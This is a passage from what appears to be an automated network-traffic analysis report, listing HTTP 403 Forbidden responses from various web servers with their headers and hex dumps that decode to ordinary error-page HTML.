friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 31 May 2023 12:51:32 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: pQKMUYCC/9fnkIFliData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:32 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:31 GMTServer: ApacheContent-Length: 318Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 31 May 2023 12:51:32 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: pQKMUYCC/UjDTa3bEData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 31 May 2023 12:51:48 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nkOwAdKl%2B%2FT3S%2FlfbHOPr2LlQVDJp%2FykHKtPyxVEPUS7ez75G1%2BR6PRzj8hZEheSQBTmpmORkcW3g4ZdW%2Bz8h8PQCj4bALumlGuJHdFp83qZ3%2F%2Bt1%2BlLUU%2FNswOh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff59541ade692e-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 Data Ascii: 11a2<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: namecheap-nginxData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:33 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:33 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: qdrMdw4zrP0/E6B8JtgqKA==,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjII+12BNUOvw3X34fSrjio,m0j2EEknGIVUW/liY8BLLm+RUUxFrhyTYE58WvxHjklsl0ueLMGCVziLUYuJmnC9X-Wix-Request-Id: 1685537493.249827962346114983X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:33 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:33 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 